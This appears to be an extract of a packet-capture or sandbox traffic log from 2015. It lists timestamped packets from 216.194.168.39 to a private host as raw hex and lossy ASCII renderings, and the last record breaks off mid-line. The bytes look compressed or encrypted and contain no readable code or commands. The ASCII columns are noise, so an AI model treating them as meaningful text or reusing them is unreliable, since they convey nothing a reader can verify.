Feb 19, 2015 13:01:59.967152119 MEZ801032216.194.168.39192.168.1.10Data Raw: 1a dc da a2 19 77 e6 55 9a 80 6a 29 c4 bd c2 13 7b c1 13 48 14 86 2f 3c 6b 8c aa 17 ba cc 72 40 72 1f 2d 5c 63 40 be 72 17 59 67 28 7b 09 a8 3b 5b 71 9f e7 4f ac 68 3b ee 4d ce a4 70 cc 3e 24 32 16 c0 41 75 ed 28 65 ac a6 72 f1 4e 42 35 23 7b 29
Data Ascii: wUj){H/<kr@r-\c@rYg({;[qOh;Mp>$2Au(erNB5#{)@=?B~4>x[jqc:92jWs\>su8+I{eKDc|>-Bv&~{~b;vH-~Y@{!_5_n**>I"rg^2-l
200
Feb 19, 2015 13:01:59.967155933 MEZ801032216.194.168.39192.168.1.10Data Raw: b8 3a d5 ca 5b 6c 16 0b 84 0f 19 53 43 aa 07 c2 7c d3 04 cf 40 44 92 9b f8 ac e8 63 76 53 2e 49 fe 3b 3e b5 82 3f d3 76 fc 21 7c fb 6b ce 0a 29 c3 e8 94 ce dd de 3e dc 87 7c 41 47 08 97 5c d0 c0 f9 cd e0 58 f4 1b 78 7c f4 4e 52 59 6e 37 e5 ae ac
Data Ascii: :[lSC|@DcvS.I;>?v!|k)>|AG\Xx|NRYn7PW6>/Ueo)ux>;t7!-%|& q3X|g~.L_>$2Qe|-bcQ^:D$9I>&l"!mp|
201
Feb 19, 2015 13:01:59.967310905 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f 77 33 f5 d5 c5 50 0a 69 54 3e 72 54 5c fb 2d 4d cc b6 32 55 af 82 51 7b 62 87 ae 7e 58 95 e1 09 7c a0 9e b1 ac 88 60 41 cf 30 ce 3f 8f 3e 91 a6 bc 78 72 de 3a 67 3b 1d c0 c5 91 25 ee 67 49 6e 0f 90 89 a1 50 1b e7 24 85 3e a1 f3 63 78 1e ee 35
Data Ascii: w3PiT>rT\-M2UQ{b~X|`A0?>xr:g;%gInP$>cx5Bosp~?DR>|K!v/_3~<bTcMu*R"gd~~h@?30S->b$<%OSXA`@xT)>Hm#b.z?>Y}vS> ]6pi?e
202
Feb 19, 2015 13:01:59.967318058 MEZ801032216.194.168.39192.168.1.10Data Raw: 54 21 25 fc 7b f6 3d 6a 3e 3b 57 dc 2a 77 e8 61 f3 ae 87 25 2f 62 12 97 f0 32 7e ec a9 9d 1e 8e 57 8d f7 ac 67 33 77 61 d3 5d e8 34 3f a9 be ad d7 34 b2 2a ab e0 7e 81 2f b3 7e 45 ec 7c c7 ac 55 5e 77 ca a8 8e a4 32 3e 54 e4 af bf 29 b4 21 9a 3e
Data Ascii: T!%{=j>;W*wa%/b2~Wg3wa]4?4*~/~E|U^w2>T)!>(jU33v]_>]6%T+<6<~O"}GfmWueRg~{">r'[kvjWhq>W9+0)ZqZ;zy />ITbS~.q
203
Feb 19, 2015 13:01:59.967320919 MEZ801032216.194.168.39192.168.1.10Data Raw: 15 e4 4f b0 0e c2 28 2c 5e d9 28 69 b6 5e 8f a8 37 1f f4 ac 79 d0 2c 8c 46 54 2a 55 3e c4 28 34 21 84 d7 69 a4 20 ca c3 1a e3 d4 c0 ce 32 80 d9 4e 82 72 de 35 ab 14 ac 13 47 21 48 a9 10 fa f9 3e 72 4d 8e e4 e8 55 45 97 29 cd ad 69 8c c0 a2 1d 68
Data Ascii: O(,^(i^7y,FT*U>(4!i 2Nr5G!H>rMUE)ihZi6,y9x\81z`-\e>r>SD<7:)>4:I#<("mQnCaT??W>\47WEaFLadJt(4T^#5>vQ{Is$Qi
205
Feb 19, 2015 13:01:59.967487097 MEZ801032216.194.168.39192.168.1.10Data Raw: 7d 4e a1 e9 53 d1 83 b1 42 f9 0d 73 57 90 4c 41 3e af 1b 1c 51 32 9c d1 3b 8a c8 52 4e e4 7f a8 d8 01 81 a1 05 c5 04 33 14 11 99 ec 2e f9 a4 44 01 87 ba a4 75 91 39 49 f2 c5 48 d2 58 d1 81 db 34 3a 7f 94 82 30 9c ac f1 e6 fe 50 b0 e9 2e 37 3e 4d
Data Ascii: }NSBsWLA>Q2;RN3.Du9IHX4:0P.7>MTUXQa|#6|WD$0>$Bw*@u;>mXa$OOB\p]7O=cf`>rPqu>wQff5^a3z>Hg}1e;Y9X9
206
Feb 19, 2015 13:01:59.967492104 MEZ801032216.194.168.39192.168.1.10Data Raw: db 9e 84 c5 38 de 82 ee 8d df 94 7e 3a 8c a3 ac 90 20 9e 2d 71 e6 91 39 3e ce 0b 52 be 32 07 fe 76 f9 e8 e5 58 ba ea d5 b7 c8 82 44 8d 2c 65 0f 7c 99 ad ac 7f e8 81 91 9a bb e6 cb 32 2b 3a 03 9f fa 04 1b 5f 15 48 ac 94 d9 5f 21 74 eb d3 21 3e f3
Data Ascii: 8~: -q9>R2vXD,e|2+:_H_!t!>Dl<C1>2c2:TG^7\.egdZb>q}Z'J2f^Ry:EdXVNvAc>B.d4VL%>"k#U)ffnn=pi>byDd",l
208
Feb 19, 2015 13:01:59.967494965 MEZ801032216.194.168.39192.168.1.10Data Raw: 24 5e 26 be 98 95 15 ae 7d 5b 84 92 2e 7c cf 96 75 8f 1e ec 5c 7f 64 cf 2a 5b ff ab 2f 65 c7 a8 ee 25 59 7a f9 a7 84 e9 c7 d7 5c b8 d4 9e 51 ac 31 fd 8c d9 2e dd a1 b0 3e b6 0c 92 a2 36 df e6 25 6e 5c 61 6e 42 90 3e d4 b9 04 d0 c1 17 ef 5e d2 ba
Data Ascii: $^&}[.|u\d*[/e%Yz\Q1.>6%n\anB>^?>O/@u10R}>r^Z<; YD\>5d~/k@6*\1`bBq>.Wy+h?<JT&#>KrQx_NFfC%\HwDq/m6y
209
Feb 19, 2015 13:01:59.967552900 MEZ801032216.194.168.39192.168.1.10Data Raw: 47 cf 85 08 be 24 14 b0 0f 2a 47 ac 3f 78 bf 41 7a bc 2b 31 3e 38 b5 e5 42 c4 d4 03 9e d2 a8 ce 29 a6 b9 df 88 7b 85 3b b3 08 2a 3b 7a d7 01 9c e8 b9 70 a6 a1 dc 5f a2 4d 29 85 26 c3 a2 ba 5a 5e 9a 4c ac f6 c8 d5 d7 cc 5f f5 26 3e c3 6b 94 6a 89
Data Ascii: G$*G?xAz+1>8B){;*;zp_M)&Z^L_&>kjDFNqT'WD1>se62f;.>.]^D.^e,biS=|Nx11f?*.6v>*J^/X@N-@Zy(S>0i}
211
Feb 19, 2015 13:01:59.967567921 MEZ801032216.194.168.39192.168.1.10Data Raw: a1 23 8f ab b2 dd 4a ac e2 45 bf 04 0f 84 6d 9b 3e bd 7d f6 99 5f bc 3b 6c 3e 35 d3 94 2b df f4 9b 7d 87 1a dc 84 35 1b 75 b0 51 ac 6a 3c ba 8a cd b6 78 6a 3e 71 4c 8f 55 27 ba 70 6c 47 89 d3 3e c9 f9 ef d3 9b 87 bc 0b 6e 7e 05 24 fe 5a ad 05 40
Data Ascii: #JEm>}_;l>5+}5uQj<xj>qLU'plG>n~$Z@]SN"Toxm.k2Z` :Zw9)QqJO2>Dd&^Vy 6]'rh>(qhvghGzy:w2>}w`n^11@A#}
212
Feb 19, 2015 13:01:59.967571020 MEZ801032216.194.168.39192.168.1.10Data Raw: 65 4c 33 f3 66 46 88 fd 36 43 89 ae f1 f6 08 ac fa d1 a8 b9 68 b9 a4 5a 3e c0 f2 41 dc 21 37 fb d5 ad cb 80 ce a4 31 39 b7 e8 88 e8 7f 7f 5e 31 e9 ad 02 ac 6d d2 ad c0 00 ec fe 9b be d5 9d b6 28 7b cc b8 11 b0 89 85 38 6a 97 f2 96 41 e8 34 3e 9e
Data Ascii: eL3fF6ChZ>A!719^1m({8jA4>Gl5}/l#Pyv!C~1=Ke>GPp/K:NUGu;jb G*aY7>Iq?J=zcBZ#pH2)RL{&QL
214
Feb 19, 2015 13:01:59.967768908 MEZ801032216.194.168.39192.168.1.10Data Raw: e3 d5 cb 70 fa 61 ce 40 3e 94 59 b1 ef c3 67 c6 cb 16 17 e9 93 62 56 de c4 30 8a ea 7f 74 65 b9 ed ec 83 ac 80 0c ee d4 49 6e b0 78 3e 3b 01 ec 14 89 49 8b 5e 1f e4 66 f0 67 8f de 35 d1 9a c8 1a 23 6e 37 32 09 b0 9d 3e cb 0f 67 7f 42 51 de d4 26
Data Ascii: pa@>YgbV0teInx>;I^fg5#n72>gBQ&57O^^hd^Xi'>d/nli^AyJPc@kW1Jp&l>wg~zM` k>+FZ(y\hTM8Zd^M
215
Feb 19, 2015 13:01:59.967773914 MEZ801032216.194.168.39192.168.1.10Data Raw: 18 3f 76 e1 75 40 ff ac 13 7f 6a 7f 53 c2 d3 2b be 43 b2 44 32 55 f8 7e e1 80 8a 75 3b f2 0e 04 d6 95 11 7e 3e 8c 73 ed f7 ce a9 fa 79 8a 93 d8 08 a1 36 19 7c f6 8b 5c d6 3f a4 0f 7b 5f f9 ac 7f fb 1f 85 c1 8b c3 07 3e 85 69 00 84 84 02 fb e2 93
Data Ascii: ?vu@jS+CD2U~u;~>sy6|\?{_>ieccw5Pf2!>.Pz<#S~?=BXa<7/]>vc(qX|Zl,;~y<!&C^>%Dg
217
Feb 19, 2015 13:01:59.967843056 MEZ801032216.194.168.39192.168.1.10Data Raw: df 8b fd ac 4c 64 e5 ab 1d bd 9b ec 3e 6a fe ed 2f 70 c3 4d 69 f9 cd 90 8f 29 9c 3f 6a d2 9d ac 27 da 86 d8 15 01 e1 84 3e dc 97 91 50 65 2a 79 f1 f8 f9 94 45 84 64 5b 3a 47 8c 60 8a 9e f3 ee 16 d7 bc ac 1e b1 9c cf 7b 74 7d 8b 3e da da 5f 7e 67
Data Ascii: Ld>j/pMi)?j'>Pe*yEd[:G`{t}>_~g-WgZur`V*D(7Ssosahk2nEG\O8mG$@S1n>^w,]8O>{1o366>)' V=Bw-|>D(
217
Feb 19, 2015 13:01:59.967911959 MEZ801032216.194.168.39192.168.1.10Data Raw: 89 a8 dd 35 38 fe 5c 90 8d 2f 7f 96 b3 01 26 6a b0 ac d4 56 98 37 3c 03 ed 54 3f 34 86 41 55 2a 28 ad 07 35 8d 68 72 33 04 e5 9b 0c cd ac 93 20 bc a9 50 38 af bd 3e 91 c0 ca 7a 69 7d 1d 7f 78 cb 5e 0c eb ba 35 b1 32 8d 27 b6 5f 91 b1 7e 1c 3a ac
Data Ascii: 58\/&jV7<T?4AU*(5hr3 P8>zi}x^52'_~:]:w4pv vuE.aepXz>(HMSmS[V}>38Mf~2Ipe*>7g_y-9u`[
219
Feb 19, 2015 13:01:59.967917919 MEZ801032216.194.168.39192.168.1.10Data Raw: d4 14 3e 31 e6 51 1f c0 55 9b 4e d8 f7 5f 3f 3b 71 cc ee 53 8e 87 6d ac 5c 53 62 41 61 ac 03 9e 72 c7 51 93 eb 21 3e ed 24 af cc ab fb b9 1f e1 6c 56 b5 99 6c ef 4f 39 8e 31 70 21 31 4d 93 a5 93 2c 47 7c 07 91 f5 ec d7 93 23 e9 94 aa 84 43 96 8d
Data Ascii: >1QUN_?;qSm\SbAarQ!>$lVlO91p!1M,G|#CN.R>uoN-^uq.JnG%9e5=" p\@!+>M+Fo{ko>[n$f3>TH&_Ni
220
Feb 19, 2015 13:01:59.967921019 MEZ801032216.194.168.39192.168.1.10Data Raw: 41 ab 16 b6 d0 ac 55 04 b5 32 65 a8 e3 35 3e 60 ab 13 6c a6 ea 3b 82 c8 c4 5b 70 4a 82 cc 58 b1 9b ac 6f 03 ec 6d a9 ee e7 ed 3e 15 bd 2a 3c 01 62 f3 04 4f b4 10 c3 44 03 4d 63 39 90 1a 97 5e 40 45 73 2c c6 ac b4 d4 1a b2 cc 5b 81 3b 3e a5 70 6c
Data Ascii: AU2e5>`l;[pJXom>*<bODMc9^@Es,[;>pl8XREPoH>E9_~_;}Xm">/ye.7q<8<k!'x#bvq><z^qo\TsrnSm>Fs9gx;E8/bHJ/>DzF
222
Feb 19, 2015 13:01:59.967977047 MEZ801032216.194.168.39192.168.1.10Data Raw: ec 13 e2 b0 dc 4d 6c dd 7e b6 07 cc 91 92 14 fc 71 d2 5f fa e5 ac c5 f6 32 5f 36 f6 e5 4e 3e 9e 1a ed 7b e8 10 5e 90 39 0d b1 5a 9a 60 5f 23 f4 97 ad 77 ba 8f c9 14 db 62 5d cd be 10 2c bf 97 4f f4 5d e1 91 a5 96 a7 d2 ed d3 e6 d5 ac 1d 73 01 b4
Data Ascii: Ml~q_2_6N>{^9Z`_#wb],O]sZzS>O_ x/4Jh;!2S"~>E>a#HDXt7{olxz6|H>`EnV}_bS=dSc(!4"U
223
Feb 19, 2015 13:01:59.967991114 MEZ801032216.194.168.39192.168.1.10Data Raw: e7 41 a2 57 b2 bc 3b 65 b2 bd c5 16 cd d1 08 20 56 aa 09 58 6c 48 7d be 93 17 a9 b6 87 ca 0a d8 1f ac 77 22 e5 09 e2 c5 dd 81 3e 04 dc ea 7f b8 95 c3 71 2b ea 97 36 34 58 de cb 58 46 ac 51 08 ab a9 23 78 10 4e 3e 3a e5 e7 92 92 9d 2e 32 30 d4 0c
Data Ascii: AW;e VXlH}w">q+64XXFQ#xN>:.206w&o<1Y>W7iamx(s}l5>awV@DnRLC!QGW39.,["APLNifVvF:j>?`1%*WiqZ
225
Feb 19, 2015 13:01:59.968238115 MEZ801032216.194.168.39192.168.1.10Data Raw: fe ac eb dc ee 6f 90 37 fd a2 3e 17 3a 88 b9 31 db 9b 6d 8e 69 f0 25 a9 7c 20 c2 35 94 b0 0a f1 3b 40 77 f2 16 a0 a6 4b 7b a9 d7 91 28 03 cf da 94 60 79 54 b1 34 5e 81 58 ac ac cc 37 b5 92 6d c2 a4 3e 05 b4 e0 2a c3 12 f3 cc 9c aa f6 20 04 fd 06
Data Ascii: o7>:1mi%| 5;@wK{(`yT4^X7m>* y-zcr[uK>yIutq;Y4G>/gTO;B?d?6{-->fG'J|[>`nmTh0$Nay n4J>ye'ns;uJ^><pH
226
Feb 19, 2015 13:01:59.968332052 MEZ801032216.194.168.39192.168.1.10Data Raw: b5 ac cb be f8 ec c1 95 6d bf 3e 42 1f 21 33 a5 33 2e 11 02 9d 41 b4 5b 14 91 70 b2 96 c3 3b 6c 90 c2 64 e8 8c 55 17 07 14 13 1d aa d9 a4 e0 ff 95 ab 5f 90 bb 17 78 96 a6 ac 38 6b de e4 23 dd ce 9f 3e ef ab 50 a3 81 cf d6 20 10 cb 98 bb 2c 7c e3
Data Ascii: m>B!33.A[p;ldU_x8k#>P ,|9Y6j2Wq_ZGNF]L>4rH754}hv:c|#9tz^T%J>[j'LN:G?>jg1x(s/?c#BD>H:|
227
Feb 19, 2015 13:01:59.968338013 MEZ801032216.194.168.39192.168.1.10Data Raw: aa 52 2a 06 9b ed 2c 49 77 90 fd 60 7c b5 b4 3a 3c b9 fe 7a 87 2c 4f 7d 16 dd 37 b1 86 ae 4b 93 94 e7 d4 34 1a e8 ff 3f 36 ae 1f 70 ef ad 2b f2 0f 2d 1e 23 3c 6d ba 63 eb 0d 3a 5a 17 85 bf 99 9e 78 72 6e 76 ab 2f dc 95 a1 9a 7b 74 a4 3e 7d a4 6d
Data Ascii: R*,Iw`|:<z,O}7K4?6p+-#<mc:Zxrnv/{t>}mo/G36-fn>^0g_=m &I->gn-ArND>]\}>VC&UZ$'~Xu9>~5+kWrqBdx>
229
Feb 19, 2015 13:01:59.968349934 MEZ801032216.194.168.39192.168.1.10Data Raw: 62 d3 d1 dc 7e a8 ec 68 29 ac 8f 7a 0d 15 f4 c6 ca d6 3e a0 89 7e 7f 5d 2a 6e 82 de 6c e9 ba c0 02 5d 87 80 97 c7 ce 3e d7 66 a3 a1 f1 ac ee 76 16 81 fe 05 f4 c0 3e 33 f7 25 fe 60 23 93 3e e7 0b 15 ac e5 4e 7b 50 89 97 43 0d 06 9d fc b4 95 24 aa
Data Ascii: b~h)z>~]*nl]>fv>3%`#>N{PC$8Ru"s<>J}:{"!^<toAMPrqJK/>W4Z*f9&.gZf{!##j44U*6<>O=F3!S
230
Feb 19, 2015 13:01:59.968352079 MEZ801032216.194.168.39192.168.1.10Data Raw: e2 09 ae ca f2 a9 3e 6a f5 60 27 ed 83 42 db 48 92 4f 6c 4c 05 41 43 6a 99 ed 36 16 ae 77 89 27 3a ac 9c 72 ee 5a b6 0f da 0b 3c 52 e2 a0 4a 25 d4 f7 90 ac 99 88 2f 08 39 85 51 aa 6b ac e6 9b df c9 d9 13 60 8b 3e 04 0d db 2a 47 f2 bc 7f 58 da c8
Data Ascii: >j`'BHOlLACj6w':rZ<RJ%/9Qk`>*GXfEO,G1} >{eoa@BGBSXy>*AAhx4xU)%@0-lgbox!~'.,XB<v(s'>#A9nIxKA^B
232
Feb 19, 2015 13:01:59.968354940 MEZ801032216.194.168.39192.168.1.10Data Raw: 9a 0d 76 29 ac 61 32 7c a7 ac 7a a4 87 90 46 4d 12 dc 3e 76 5c e5 0f b5 db 7e 2b b8 4d 35 ef c9 b4 90 8b 9c 99 43 3d 52 99 70 5e 30 71 82 7e bd d9 07 08 08 26 8c 0b b2 9a e7 45 b0 97 84 93 03 c7 ac 33 7d 0b e6 b5 c1 00 a1 3e 39 2a 66 e9 43 57 80
Data Ascii: v)a2|zFM>v\~+M5C=Rp^0q~&E3}>9*fCWFr>0~OR*up:B>;"U;~TWEwwP>G=vhQee4JRQ/z1rFjZeGt7[t_>
233
Feb 19, 2015 13:01:59.968391895 MEZ801032216.194.168.39192.168.1.10Data Raw: d8 fb c6 98 fb ac 3a 2e ba b1 cc 4f 3b ce 3e 51 08 de 7b 28 3d bc f8 24 c3 83 0a 28 1f bd 24 33 9c b9 61 76 87 5e af 69 2b ac 23 8a fa 67 df 27 59 10 3e 67 b4 cc 7f 55 6a cc f8 25 e4 ed 0e 95 97 b3 d9 7d 41 ac 09 10 dd aa b6 c3 6a 18 3e 1a f1 f2
Data Ascii: :.O;>Q{(=$($3av^i+#g'Y>gUj%}Aj>wWHb4Z#7NR0Xh/3%,>fKw4ulr>22IDjsF\o[9FA>"]k(M1P!#n2,Hew2TV/~zD3~>
235
Feb 19, 2015 13:01:59.968396902 MEZ801032216.194.168.39192.168.1.10Data Raw: a5 43 3a 8d 74 a8 ec cf 9a 51 d4 4a a4 ac 15 67 66 ee eb d0 72 3f 3e c8 6e f9 a2 f1 91 63 1a 93 1f cc 8a 8c c3 be 47 77 9d 61 3c e9 67 53 7f ac 63 9c 18 e3 bd 95 b1 9d 14 a8 4d 96 9d 45 97 4c e0 7a 14 23 6a ac 78 8b 8a 4b cc fa 35 ed 3e 5f 0c 7f
Data Ascii: C:tQJgfr?>ncGwa<gScMELz#jxK5>_QBh.~+>5|#i@(8r@tD8Hy+=p>MqAcR3T3]pUIwCU:RjCoNMW~862#d-:N
236
Feb 19, 2015 13:01:59.968624115 MEZ801032216.194.168.39192.168.1.10Data Raw: 92 ec a2 1a 33 54 76 aa 9c fc 05 f1 c6 56 dd 9c 6f f7 3e a8 df 24 eb 5c b3 f8 69 ff 8b 70 f5 25 d1 a1 99 68 9f 96 29 4b 2f b9 72 fd 82 ac d0 36 dd 89 c6 14 66 ef 3e 6e 75 40 04 08 8f 37 40 2a 2f cc 60 08 f3 fd 65 00 c5 36 3e 05 b4 f3 b7 f4 c9 75
Data Ascii: 3TvVo>$\ip%h)K/r6f>nu@7@*/`e6>u;Lhr>-<^(3RQ5k}G"[#\5tsipPr>z$@ X!$gjv*hx.)w@H/>Km$V}4;
238
Feb 19, 2015 13:01:59.968636036 MEZ801032216.194.168.39192.168.1.10Data Raw: e1 67 a0 5b 85 ce fb cd a0 a6 e5 7e bc ed ca 54 d8 ac 7b a8 e9 14 32 8a 51 e7 0e 59 0f ae e1 52 a5 95 3b 33 f2 ac 8b 9d 15 7b 86 c3 ad 84 3e f5 11 0d b5 28 e8 30 a0 73 0c 28 47 3b ed 6c 01 ef a0 3e 45 61 0f b2 42 37 8f ac c4 a3 65 ff 54 81 2f c9
Data Ascii: g[~T{2QYR;3{>(0s(G;l>EaB7eT/>Od@|y<! h2wO?hpR<gY4%Y>t;_|o]1>Yl[02U0ln>6NMSaA ,Fsc4
238
Feb 19, 2015 13:01:59.968691111 MEZ801032216.194.168.39192.168.1.10Data Raw: ad e5 5b f1 aa 2d 61 da a0 f5 3e 8e d3 cf 4c 79 c3 ac 7f 80 20 fa 35 42 83 92 3e e0 87 7c 25 a0 91 8c 13 e8 78 13 3b 56 a5 16 de 05 c8 45 3e a3 ed ed cc 46 09 60 41 f3 03 a9 02 b4 d2 34 9c 3d 20 a6 44 33 9e c4 43 e3 3f af 3f 61 a3 26 80 3e 9d c1
Data Ascii: [-a>Ly 5B>|%x;VE>F`A4= D3C??a&>GYw|]u'B>:+YC]M:zc)>$_j8D$FfI2^ndr>vk7'IM^:OD!6+.@"
240
Feb 19, 2015 13:01:59.968696117 MEZ801032216.194.168.39192.168.1.10Data Raw: e1 2e e9 44 01 ab 3e 73 01 c0 fc 4e 82 b4 1d 56 8b 07 5d 29 f4 a8 d8 7a 82 8a 8a 1a e5 a6 e5 51 05 26 3e ec 82 fc 51 d3 7b e4 e2 5d 98 31 3f f7 2f f8 5e 33 a2 54 76 21 c5 20 6d da 74 ac a8 48 be 2b ae f4 e1 51 3e cb f7 29 0a 83 57 ac d2 66 de c8
Data Ascii: .D>sNV])zQ&>Q{]1?/^3Tv! mtH+Q>)Wfr/*hLS7)s5<f;mu(D]BwK>Q&~v/7Fnjt7"$>:}#8]t+0gsF[X>`_D%5
241
Feb 19, 2015 13:01:59.968759060 MEZ801032216.194.168.39192.168.1.10Data Raw: bb ac 64 81 43 69 63 62 dd 9e 26 5b 9f 1a b1 c7 2a a8 3a bd e1 ac eb 47 56 ec 0d 48 9a e8 3e 63 42 a6 33 aa 1d 63 55 c9 cb 51 62 ba e8 1d 6b 3d a3 ee e1 d6 ae 85 64 f0 33 ac 1f 66 96 b0 6b 0e 31 5c 0e 2c be 3f 06 1e a7 65 3a df 0a ac 80 59 d2 27
Data Ascii: dCicb&[*:GVH>cB3cUQbk=d3fk1\,?e:Y'>rEw^lvGC<@lUs>$PyqQ#Po9jVH?}F>EnlH>I0[kZxq~TaI;OR-lt>wN~Huuuc(i
243
Feb 19, 2015 13:01:59.968775988 MEZ801032216.194.168.39192.168.1.10Data Raw: b5 a8 7f a1 c9 f7 37 73 aa b4 3e e3 03 7a 5a 39 69 e0 00 31 bd 56 c9 e2 f5 95 2f bb 25 f9 c6 72 e4 eb bf a2 5e aa 3e 76 bc 43 04 2b 58 c8 15 38 e0 74 3c 78 6e 01 bf ad a5 a9 ed e2 82 e9 25 87 dc ac 0c e6 08 a0 32 29 c1 d7 1e a8 0d ff c1 a1 fe a4
Data Ascii: 7s>zZ9i1V/%r^>vC+X8t<xn%2)Xvb@/I>{$Jp##NjW\Y,>FO!m%!<tN~VVmJVpaR}z_>F.9c_\C;`x53j<m{&A>iU<`1p
244
Feb 19, 2015 13:01:59.968813896 MEZ801032216.194.168.39192.168.1.10Data Raw: 06 ac 32 6a 75 01 cc 2f 5a 04 3e 88 60 58 9a 7e fc 20 3f 9e e7 ea f6 e9 d5 48 ec 5a a6 a0 7d 36 d4 cf 40 84 a8 ac ee 6c 6b b1 bc 33 57 5f 26 e4 cb e2 e1 a3 0c 13 87 3c ca ac da 74 42 b9 b3 c9 a8 a7 3e 65 b1 cc c8 d4 4c 48 3e 6c 7d 71 4b f0 0a 64
Data Ascii: 2ju/Z>`X~ ?HZ}6@lk3W_&<tB>eLH>l}qKdA>Hcq||&R\6;>1n6o[M 4p4U=!4&V"1n$M3>:A_vF+^ ,S/#:/};a0QK>4kr
246
Feb 19, 2015 13:01:59.969012976 MEZ801032216.194.168.39192.168.1.10Data Raw: 0d ef f3 4f a9 77 32 d6 40 17 09 3d 55 d5 3e c2 ae d5 2e 6f 2f d7 2e 0c b5 b8 fa 46 09 39 db 6d a8 da e6 93 1d cd 90 51 66 ac cf 81 ec dd 12 01 b7 d1 3e 42 fd af 45 97 9f 46 5d 15 e9 25 35 0a 53 48 78 77 a8 ea ce 59 9c d2 7a 15 35 2c 73 36 48 25
Data Ascii: Ow2@=U>.o/.F9mQf>BEF]%5SHxwYz5,s6H%22Izt[\_^~I>U>>%&%s(;?i4g>8TJ&%4cQD7> lf5%k{~F>^u>2)~x"
247
Feb 19, 2015 13:01:59.980128050 MEZ801032216.194.168.39192.168.1.10Data Raw: 12 36 a9 09 9e 78 b8 c9 7f 49 be ac f6 7b a8 9f ed 4a 51 ae 3e 48 78 ed 00 f0 bb 8b 31 58 ff 95 92 f3 ed 81 c3 5e a9 ac f1 fa a6 2d d2 dc 0c ac 48 a3 1a 5a 2c 3e af f2 3e 78 81 e9 8d bc d6 cf 15 61 26 5b 19 e4 ca a1 6e eb 69 ed c8 56 91 aa 5c ea
Data Ascii: 6xI{JQ>Hx1X^-HZ,>>xa&[niV\Ff)V1",i+Il->Wc5gno;rfS=lk'jq>{$^}=$N#z6~n4<v>f~if5QH3:
249
Feb 19, 2015 13:01:59.980143070 MEZ801032216.194.168.39192.168.1.10Data Raw: 73 6f 0e 5c d7 8a 47 72 3e cc c6 d2 24 f8 0b b3 8d 82 ef ee b1 2c c8 62 65 d0 95 ac ac 2c 9b 6c 98 e8 ee 0e 3e 85 30 c5 40 dd 3a df 8c c9 1d fe dc 95 2d c5 9a c0 aa c1 76 f1 4d f4 f1 60 2a ac c1 f5 fd b4 ce a3 46 be 3e b8 ad f5 c6 25 0b 38 26 92
Data Ascii: so\Gr>$,be,l>0@:-vM`*F>%8&"9f%z8> :#'GsC28S^U>,z*h6:z3Q1j&U3yd8{iUP<:U0T.&sQ*>9Yc
250
Feb 19, 2015 13:01:59.980149984 MEZ801032216.194.168.39192.168.1.10Data Raw: a3 30 93 ad ac 2c 26 96 e4 fa 94 93 ca ae ac 1d 6d ee 77 54 af 55 6c ac fb 71 ff 5a 17 90 a2 36 3e 4d 9a 31 67 e0 36 3e f9 35 ec 0b c8 e0 d3 e9 a9 eb a0 b6 7e 47 c7 26 3b 25 cd a0 e0 3a 90 16 ca e1 32 f7 53 af ac 25 67 01 9e 98 1e 99 2d ac 27 1d
Data Ascii: 0,&mwTUlqZ6>M1g6>5~G&;%:2S%g-'G~Q>5-5C"7.7g1J8t8A5>}%JkHAQ273P^GVhVo~f"R?M8A->2p_j|=xmY.G&H1b
252
Feb 19, 2015 13:01:59.980154037 MEZ801032216.194.168.39192.168.1.10Data Raw: f3 8d e9 3b 3a 29 f7 b7 22 48 60 54 79 80 ad 80 a8 a3 85 15 d3 6a c5 ac 95 d6 33 cf 33 63 03 cf 3e 03 ac e8 75 14 1e 19 29 a2 85 9d 88 a6 47 5e 79 c0 ad 5a 7c c3 69 71 fc 57 4c a8 77 eb b6 bf cd 3f 0d 1a 29 a9 2c 1b 9f 5e 23 e2 c4 17 ad e4 db f7
Data Ascii: ;:)"H`Tyj33c>u)G^yZ|iqWLw?),^#Yy/!1Z+xiu*sp>@E'~yc<m_)JIMb[5>)T^]aBX_>oz`(G2px<>tP$MtgQd
253
Feb 19, 2015 13:01:59.980299950 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 0c 36 0f d8 4b b7 17 3e 48 c5 8b a6 6b 3f 23 de 09 a8 7e 9c 44 c1 e1 c2 b5 af 80 da 4e 1b ce fc c6 8c ac 3a fc 3b d5 7d 9d c2 6d 3e 4b 4e 39 77 c0 d4 f4 c7 11 b0 a9 27 16 44 ce 31 63 87 93 3e e2 f3 b0 69 e5 db ff cf 17 20 46 7d 58 58 ed 5b 19
Data Ascii: >6K>Hk?#~DN:;}m>KN9w'D1c>i F}XX[?9ip ->;?5!N c7R_}l>^jv;1vD~,:P'>g_f.`5`s+/~>?Vvf>?/|Y1s;I><!&9FnR\S0
254
Feb 19, 2015 13:01:59.980446100 MEZ801032216.194.168.39192.168.1.10Data Raw: 88 78 32 eb 1a d3 b5 5f 3e 39 8b c2 fd e0 3a cf 15 14 2e 0c 5e 11 2f a9 a7 23 be c7 3e fb 63 d5 85 65 62 64 f1 29 b5 19 3f 06 14 45 fb 32 b0 bb ce da 98 d0 4e f1 2e ac 5e 98 f8 e2 22 7f 0d 83 3e 72 58 81 f1 de 28 9c 0d 32 99 82 20 67 f1 d1 0e 4b
Data Ascii: x2_>9:.^/#>cebd)?E2N.^">rX(2 gKJ'wZP>`:<J<J^K>5}}CH|vV';>E?>09?j,>piHpTQ.;$IJ+Po>N/6$G(
256
Feb 19, 2015 13:01:59.980453968 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 28 b1 ca 9c d3 44 d8 74 c7 4f 8c 34 e9 e6 ec 41 aa b6 80 ad 92 dd 59 5b ac 69 6d 89 f8 b1 70 7d f8 e4 8d 60 86 f6 ac 7d c6 9d 07 5b 11 81 a1 3e c4 8e e3 6e d8 73 e9 c1 9b dc 29 67 e1 7c 61 5c 93 b1 39 5b c6 ed c3 ba b8 05 ac 01 cd b4 83 1f 72
Data Ascii: `(DtO4AY[imp}`}[>ns)g|a\9[ruI*wUh>_r'nu#zJ17^+4w[1@>?"Q}E8WeykBh6/fu>/O_\I<>p;o)f8
258
Feb 19, 2015 13:01:59.980463028 MEZ801032216.194.168.39192.168.1.10Data Raw: 5e fa 75 ae 82 82 5b 5e b5 6d b2 50 f3 4f ef bf ef 7d 67 ac 32 aa 93 b8 25 e6 ec cf 3e 16 81 9b 09 23 f8 59 d5 03 28 22 c8 67 e8 94 e0 50 83 b7 7b 4b 53 03 3b ae b6 5a f3 08 42 20 8b 31 7c eb cb 2a b3 ce 36 c7 bd dc 7d fc 0e ac 68 30 f4 1a 63 36
